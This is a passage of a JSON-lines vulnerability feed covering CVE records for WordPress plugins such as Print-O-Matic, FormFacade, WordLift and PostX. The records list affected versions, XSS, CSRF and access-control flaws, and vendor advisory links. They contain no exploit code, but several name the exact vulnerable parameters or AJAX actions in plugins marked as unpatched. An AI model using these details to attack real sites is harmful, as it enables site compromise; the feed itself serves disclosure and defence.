replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c13ba1df-25fa-4cc8-9745-2d6f6168788a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c13ba1df-25fa-4cc8-9745-2d6f6168788a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-custom-fields\\\/trunk\\\/delete-custom-fields.php#L357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-custom-fields\\\/trunk\\\/delete-custom-fields.php#L357\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3671","slug":"print-o-matic","versionImpact":"2.1.10","description":"The Print-O-Matic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'print-me' shortcode in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping on user supplied attributes such as 'tag'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10ea8f3a-35d6-494e-90f6-9165320cf99c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10ea8f3a-35d6-494e-90f6-9165320cf99c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/print-o-matic\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/print-o-matic\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4758","slug":"muslim-prayer-time-bd","versionImpact":"2.4","description":"The Muslim Prayer Time BD WordPress plugin through 2.4 does not have a CSRF check in place when resetting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64ec57a5-35d8-4c69-bdba-096c2245a0db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64ec57a5-35d8-4c69-bdba-096c2245a0db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9613","slug":"formfacade","versionImpact":"1.3.6","description":"The FormFacade \u2013 WordPress plugin for Google Forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'userId' and 'publishId' parameters in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4a00ad0-5761-4fb7-a4e6-cb213cf32cb2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4a00ad0-5761-4fb7-a4e6-cb213cf32cb2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formfacade\\\/trunk\\\/formfacade.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formfacade\\\/trunk\\\/formfacade.php#L173\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11888","slug":"ider-login","versionImpact":"2.1","description":"The IDer Login for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ider_login_button' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ider-login\\\/trunk\\\/includes\\\/IDER_Shortcodes.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ider-login\\\/trunk\\\/includes\\\/IDER_Shortcodes.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ider-login\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ider-login\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de602cf8-cc02-4459-aa23-5d8236048bca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de602cf8-cc02-4459-aa23-5d8236048bca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12176","slug":"wordlift","versionImpact":"3.54.0","description":"The WordLift \u2013 AI powered SEO \u2013 Schema plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'wl_config_plugin' AJAX action in all versions up to, and including, 3.54.0. This makes it possible for unauthenticated attackers to update the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordlift\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordlift\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca6bdde6-f381-4ccb-8984-519cf9aca0b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca6bdde6-f381-4ccb-8984-519cf9aca0b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12598","slug":"mybookprogress","versionImpact":"1.0.8","description":"The MyBookProgress by Stormhill Media plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018book\u2019 parameter in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mybookprogress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mybookprogress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b20a11c1-9aa0-4f5d-af3d-89fb9bf4e1d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b20a11c1-9aa0-4f5d-af3d-89fb9bf4e1d0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12872","slug":"zalomeni","versionImpact":"1.5","description":"The Zalomen\u00ed WordPress plugin through 1.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8a706c6-7f0f-4148-9f6f-40c0ca95dd9a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8a706c6-7f0f-4148-9f6f-40c0ca95dd9a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8a706c6-7f0f-4148-9f6f-40c0ca95dd9a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8a706c6-7f0f-4148-9f6f-40c0ca95dd9a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3661","slug":"sb-chart-block","versionImpact":"1.2.6","description":"The SB Chart block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sb-chart-block\\\/trunk\\\/sb-chart-block.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sb-chart-block\\\/trunk\\\/sb-chart-block.php#L104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276462\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276462\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sb-chart-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sb-chart-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6afe4b6-c38c-46fa-82d5-95cb35c2c30f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6afe4b6-c38c-46fa-82d5-95cb35c2c30f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5259","slug":"minimal-share-buttons","versionImpact":"1.7.3","description":"The Minimal Share Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 parameter in all versions up to, and including, 1.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-share-buttons\\\/trunk\\\/inc\\\/class-minimal-share-buttons.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-share-buttons\\\/trunk\\\/inc\\\/class-minimal-share-buttons.php#L67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3302704%40minimal-share-buttons&old=3074272%40minimal-share-buttons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3302704%40minimal-share-buttons&old=3074272%40minimal-share-buttons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/minimal-share-buttons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/minimal-share-buttons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ac2ac7a-4cb5-4051-bec7-a22693c50915?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ac2ac7a-4cb5-4051-bec7-a22693c50915?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7845","slug":"stratum","versionImpact":"1.6.0","description":"The Stratum \u2013 Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Advanced Google Maps and Image Hotspot widgets in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stratum\\\/tags\\\/1.6.0\\\/includes\\\/templates\\\/image-hotspot.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stratum\\\/tags\\\/1.6.0\\\/includes\\\/templates\\\/image-hotspot.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stratum\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stratum\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8d9f6ba-1c41-4933-8eb2-8f27b9e87574?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8d9f6ba-1c41-4933-8eb2-8f27b9e87574?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23878","slug":"wp-google-map-plugin","versionImpact":"4.3.9","description":"Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in flippercode WordPress Plugin for Google Maps \u2013 WP MAPS plugin <= 4.3.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-google-map-plugin\\\/wordpress-wordpress-plugin-for-google-maps-wp-maps-plugin-4-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-google-map-plugin\\\/wordpress-wordpress-plugin-for-google-maps-wp-maps-plugin-4-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6196","slug":"audio-merchant","versionImpact":"5.0.4","description":"The Audio Merchant plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0.4. This is due to missing or incorrect nonce validation on the audio_merchant_add_audio_file function. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06513dfe-f263-48b7-ba01-2c205247095b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06513dfe-f263-48b7-ba01-2c205247095b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-merchant\\\/trunk\\\/audio-merchant.php#L1298\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-merchant\\\/trunk\\\/audio-merchant.php#L1298\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1058","slug":"so-widgets-bundle","versionImpact":"1.58.3","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the onclick parameter in all versions up to, and including, 1.58.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 1.58.3 offers a partial fix.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffeb766f-3684-4eec-bacb-bbf0d434aba0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffeb766f-3684-4eec-bacb-bbf0d434aba0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.2\\\/widgets\\\/button\\\/tpl\\\/default.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.2\\\/widgets\\\/button\\\/tpl\\\/default.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.3\\\/base\\\/base.php#L404\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.3\\\/base\\\/base.php#L404\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033967%40so-widgets-bundle%2Ftrunk&old=3031864%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033967%40so-widgets-bundle%2Ftrunk&old=3031864%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3666","slug":"opal-estate-pro","versionImpact":"1.7.6","description":"The Opal Estate Pro \u2013 Property Management and Submission plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the agent latitude and longitude parameters in all versions up to, and including, 1.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4d5d58f-913a-4a26-8b2a-bfdd08033993?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4d5d58f-913a-4a26-8b2a-bfdd08033993?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opal-estate-pro\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opal-estate-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3633","slug":"webp-svg-support","versionImpact":"1.4.0","description":"The WebP & SVG Support WordPress plugin through 1.4.0 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e0baffb-7ab8-4c17-aa2a-7f28a0be1a41\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e0baffb-7ab8-4c17-aa2a-7f28a0be1a41\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7301","slug":"wp-file-upload","versionImpact":"4.24.8","description":"The WordPress File Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.24.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2b16b9c-48c7-4370-839b-696797ff2101?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2b16b9c-48c7-4370-839b-696797ff2101?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/tags\\\/4.24.8\\\/lib\\\/wfu_io.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/tags\\\/4.24.8\\\/lib\\\/wfu_io.php#L176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-file-upload\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-file-upload\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/tags\\\/4.24.8\\\/lib\\\/wfu_security.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/tags\\\/4.24.8\\\/lib\\\/wfu_security.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136025\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136025\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10728","slug":"ultimate-post","versionImpact":"4.1.16","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin \u2013 PostX plugin for WordPress is vulnerable to unauthorized plugin installation\/activation due to a missing capability check on the 'install_required_plugin_callback' function in all versions up to, and including, 4.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/076f36fb-c2fb-43e0-a027-1351d3995489?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/076f36fb-c2fb-43e0-a027-1351d3995489?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.1.16\\\/classes\\\/Importer.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.1.16\\\/classes\\\/Importer.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.1.16\\\/classes\\\/Initialization.php#L330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.1.16\\\/classes\\\/Initialization.php#L330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-post\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-post\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188636\\\/ultimate-post\\\/trunk\\\/classes\\\/Importer.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188636\\\/ultimate-post\\\/trunk\\\/classes\\\/Importer.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11884","slug":"wp-photo-text-slider-50","versionImpact":"8.1","description":"The Wp photo text slider 50 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp-photo-slider' shortcode in all versions up to, and including, 8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-text-slider-50\\\/trunk\\\/wp-photo-text-slider-50.php#L250\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-photo-text-slider-50\\\/trunk\\\/wp-photo-text-slider-50.php#L250\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photo-text-slider-50\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-photo-text-slider-50\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f98f11da-b0ae-4c00-9708-88d6044abda2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f98f11da-b0ae-4c00-9708-88d6044abda2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12170","slug":"viewmedica","versionImpact":"1.4.15","description":"The ViewMedica 9 plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.15. This is due to missing or incorrect nonce validation on the 'Viewmedica-Admin' page. This makes it possible for unauthenticated attackers to inject arbitrary SQL queries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/viewmedica\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58209530-9e68-4d2c-a723-e6a164db7f46?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58209530-9e68-4d2c-a723-e6a164db7f46?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12508","slug":"glofox-shortcodes","versionImpact":"2.6","description":"The Glofox Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'glofox' and 'glofox_lead_capture ' shortcodes in all versions up to, and including, 2.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/glofox-shortcodes\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/glofox-shortcodes\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ed59d5b-0922-44e9-98e8-07b91d1f4840?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ed59d5b-0922-44e9-98e8-07b91d1f4840?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13364","slug":"adthrive-ads","versionImpact":"3.6.3","description":"The Raptive Ads plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the site_ads_files_reset() and cls_file_reset() functions in all versions up to, and including, 3.6.3. This makes it possible for unauthenticated attackers to reset the ad and cls files.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/adthrive-ads\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/adthrive-ads\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a08d857-c8be-4ba8-b9fb-eed222a8cd8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7a08d857-c8be-4ba8-b9fb-eed222a8cd8c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0845","slug":"designthemes-core-features","versionImpact":"4.8","description":"The DesignThemes Core Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 4.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/lms-learning-management-system-education-lms-wordpress-theme\\\/7867581\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/lms-learning-management-system-education-lms-wordpress-theme\\\/7867581\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39ea4627-66b2-42a6-913e-04c708491b8d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39ea4627-66b2-42a6-913e-04c708491b8d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
